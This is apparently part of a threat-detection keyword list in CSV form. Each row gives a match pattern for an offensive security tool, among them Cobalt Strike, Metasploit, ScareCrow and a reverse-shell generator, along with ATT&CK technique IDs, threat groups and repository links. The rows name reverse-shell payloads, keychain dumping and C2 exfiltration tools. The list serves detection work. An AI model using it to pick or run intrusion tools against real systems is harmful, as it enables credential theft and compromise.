"*openPayloadGeneratorDialog*",".{0,1000}openPayloadGeneratorDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 
- TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openPayloadHelper*",".{0,1000}openPayloadHelper.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openPortScanner*",".{0,1000}openPortScanner.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - 
T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*openPortScanner*",".{0,1000}openPortScanner.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca 
- Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openSpearPhishDialog*",".{0,1000}openSpearPhishDialog.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*openssl_heartbleed.rb*",".{0,1000}openssl_heartbleed\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*openssl2john.py*",".{0,1000}openssl2john\.py.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*OpenVAS*",".{0,1000}OpenVAS.{0,1000}","offensive_tool_keyword","openvas","Vulnerability scanner","T1046 - T1068 - T1190 - T1201 - T1222 - T1592","TA0001 - TA0002 - TA0007 - TA0011","N/A","N/A","Vulnerability scanner","https://www.openvas.org/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*OpenVPN/SOCKS extension initialized.*",".{0,1000}OpenVPN\/SOCKS\sextension\sinitialized\..{0,1000}","offensive_tool_keyword","burpsuite","A BurpSuite extension to deploy an OpenVPN config file to DigitalOcean and set up a SOCKS proxy to route traffic through it","T1592 - T1021 - T1573 - T1090 - T1071","TA0005","N/A","N/A","Defense Evasion","https://github.com/honoki/burp-digitalocean-openvpn-socks","1","0","N/A","10","1","43","9","2024-02-26T13:59:20Z","2024-02-26T13:59:17Z" "*openwall.John.appdata.xml*",".{0,1000}openwall\.John\.appdata\.xml.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - 
T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*openwall.John.desktop*",".{0,1000}openwall\.John\.desktop.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*openwall/john*",".{0,1000}openwall\/john.{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*openWindowsExecutableStage*",".{0,1000}openWindowsExecutableStage.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - 
CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Operative Framework*",".{0,1000}Operative\sFramework.{0,1000}","offensive_tool_keyword","Operative Framework","Framework based on fingerprint action. this tool is used for get information on a website or a enterprise target with multiple modules.","T1590 - T1591 - T1592 - T1593 - T1594 - T1595","TA0007 - TA0011 - TA0007","N/A","N/A","Frameworks","https://github.com/graniet/operative-framework","1","0","N/A","N/A","7","663","171","2023-12-13T22:11:30Z","2017-01-03T08:38:59Z" "*ophcrack*",".{0,1000}ophcrack.{0,1000}","offensive_tool_keyword","ophcrack","Windows password cracker based on rainbow tables.","T1110.003 - T1555.003 - T1110.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://gitlab.com/objectifsecurite/ophcrack","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*o-printernightmare.ps1*",".{0,1000}o\-printernightmare\.ps1.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","1","N/A","9","4","N/A","N/A","N/A","N/A" "*options.bruteforced_protocol*",".{0,1000}options\.bruteforced_protocol.{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*optiv/Ivy.git*",".{0,1000}optiv\/Ivy\.git.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation 
tools","https://github.com/optiv/Ivy","1","1","N/A","10","8","729","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z" "*optiv/Registry-Recon*",".{0,1000}optiv\/Registry\-Recon.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor Script that Performs System/AV/EDR Recon","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Registry-Recon","1","1","N/A","10","10","317","36","2022-06-06T14:39:12Z","2021-07-29T18:47:23Z" "*optiv/ScareCrow*",".{0,1000}optiv\/ScareCrow.{0,1000}","offensive_tool_keyword","cobaltstrike","ScareCrow - Payload creation framework designed around EDR bypass.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/ScareCrow","1","1","N/A","10","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*optiv/ScareCrow*",".{0,1000}optiv\/ScareCrow.{0,1000}","offensive_tool_keyword","ScareCrow","ScareCrow - Payload creation framework designed around EDR bypass.","T1548 - T1562 - T1027","TA0002 - TA0003 - TA0008","N/A","N/A","Defense Evasion","https://github.com/optiv/ScareCrow","1","1","N/A","N/A","10","2662","492","2023-08-18T17:16:06Z","2021-01-25T02:21:23Z" "*oracle_default_hashes.txt*",".{0,1000}oracle_default_hashes\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*oracle_default_passwords.csv*",".{0,1000}oracle_default_passwords\.csv.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*Orange-Cyberdefense/arsenal*",".{0,1000}Orange\-Cyberdefense\/arsenal.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","1","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "*Orange-Cyberdefense/KeePwn*",".{0,1000}Orange\-Cyberdefense\/KeePwn.{0,1000}","offensive_tool_keyword","KeePwn","A python tool to automate KeePass discovery and secret extraction","T1555 - T1003 - T1114","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/Orange-Cyberdefense/KeePwn","1","1","N/A","10","5","418","35","2024-04-19T13:37:16Z","2023-01-27T13:59:38Z" "*Orange-Cyberdefense/LinikatzV2*",".{0,1000}Orange\-Cyberdefense\/LinikatzV2.{0,1000}","offensive_tool_keyword","LinikatzV2","linikatz is a tool to attack AD on UNIX","T1003.002 - T1558.003 - T1078 - T1550.001","TA0006 - TA0001 - TA0004 - TA0003","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/LinikatzV2","1","1","N/A","10","2","125","13","2023-10-19T12:26:58Z","2023-10-19T11:07:53Z" "*orbitaldump.py*",".{0,1000}orbitaldump\.py.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","453","89","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" 
"*orbitaldump/orbitaldump*",".{0,1000}orbitaldump\/orbitaldump.{0,1000}","offensive_tool_keyword","orbitaldump","A simple multi-threaded distributed SSH brute-forcing tool written in Python.","T1110","TA0006","N/A","N/A","Exploitation tools","https://github.com/k4yt3x/orbitaldump","1","1","N/A","N/A","5","453","89","2022-10-30T23:40:57Z","2021-06-06T17:48:19Z" "*OrderFromC2 = ReadEmail()*",".{0,1000}OrderFromC2\s\=\sReadEmail\(\).{0,1000}","offensive_tool_keyword","SharpGmailC2","Gmail will act as Server and implant will exfiltrate data via smtp and will read commands from C2 (Gmail) via imap protocol","T1071 - T1071.004 - T1568 - T1568.002 - T1114 - T1114.001","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/reveng007/SharpGmailC2","1","0","N/A","10","10","250","43","2022-12-27T01:45:46Z","2022-11-10T06:48:15Z" "*OS-Command-Injection-Unix-Payloads.*",".{0,1000}OS\-Command\-Injection\-Unix\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*OS-Command-Injection-Windows-Payloads.*",".{0,1000}OS\-Command\-Injection\-Windows\-Payloads\..{0,1000}","offensive_tool_keyword","Offensive-Payloads","List of payloads and wordlists that are specifically crafted to identify and exploit vulnerabilities in target web applications.","T1210 - T1185 - T1059 - T1400 - T1506 - T1213 ","TA0001 - TA0002 - TA0009","N/A","N/A","List","https://github.com/InfoSecWarrior/Offensive-Payloads/","1","1","N/A","N/A","2","161","65","2023-12-12T08:32:23Z","2022-11-18T09:43:41Z" "*OSCP-Archives*",".{0,1000}OSCP\-Archives.{0,1000}","offensive_tool_keyword","OSCP-Archives","resources for red teamers 'During my 
journey to getting the OSCP. I always come across many articles. Git repo. videos. and other types of sources of great and valuable information that helps me during my studies. While having all of these in a bookmark folder is great. I wanted to also build a curated list of the resources that I've collected overtime. all in one area for everyone to access.'","T1593 - T1592 - T1596","TA0001 - TA0043 - ","N/A","N/A","Exploitation tools","https://github.com/CyDefUnicorn/OSCP-Archives","1","1","N/A","N/A","7","610","194","2020-09-14T13:01:57Z","2018-09-15T16:18:05Z" "*osmedeus cloud*",".{0,1000}osmedeus\scloud.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*osmedeus health*",".{0,1000}osmedeus\shealth.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*osmedeus provider*",".{0,1000}osmedeus\sprovider.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*osmedeus scan*",".{0,1000}osmedeus\sscan.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*osmedeus utils*",".{0,1000}osmedeus\sutils.{0,1000}","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive 
Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","0","N/A","N/A","10","5086","857","2024-04-18T08:53:15Z","2018-11-10T04:17:18Z" "*osx/dump_keychain*",".{0,1000}osx\/dump_keychain.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*osx/x64/meterpreter/reverse_tcp*",".{0,1000}osx\/x64\/meterpreter\/reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*osx/x64/meterpreter_reverse_tcp*",".{0,1000}osx\/x64\/meterpreter_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- 
TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*osx/x64/shell_reverse_tcp*",".{0,1000}osx\/x64\/shell_reverse_tcp.{0,1000}","offensive_tool_keyword","reverse-shell-generator","Reverse Shell Generator","T1105 - T1071.004 - T1016 - T1090 - T1029 - T1041","TA0011 - TA0010- TA0002","N/A","N/A","C2","https://github.com/0dayCTF/reverse-shell-generator","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*osx_gatekeeper_bypass.*",".{0,1000}osx_gatekeeper_bypass\..{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*OtterHacker/SetProcessInjection*",".{0,1000}OtterHacker\/SetProcessInjection.{0,1000}","offensive_tool_keyword","SetProcessInjection","alternate technique allowing execution at an arbitrary memory address on a remote process that can be used to replace the standard CreateRemoteThread call.","T1055 - T1055.008 - T1055.001 - T1055.002 - T1055.012","TA0005 - TA0004 - TA0002","N/A","N/A","Defense Evasion","https://github.com/OtterHacker/SetProcessInjection","1","1","N/A","9","2","135","29","2023-10-02T09:23:42Z","2023-10-02T08:21:47Z" "*ourtn-ftshell-upcommand*",".{0,1000}ourtn\-ftshell\-upcommand.{0,1000}","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","1","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z" "*-out*.exe -r:*System.Drawing.dll*System.Management.Automation*.dll*",".{0,1000}\-out.{0,1000}\.exe\s\-r\:.{0,1000}System\.Drawing\.dll.{0,1000}System\.Management\.Automation.{0,1000}\.dll.{0,1000}","offensive_tool_keyword","ThunderShell","ThunderShell is a C# RAT that communicates via HTTP requests. All the network traffic is encrypted using a second layer of RC4 to avoid SSL interception and defeat network detection on the target system. RC4 is a weak cipher and is used to help obfuscate the traffic. 
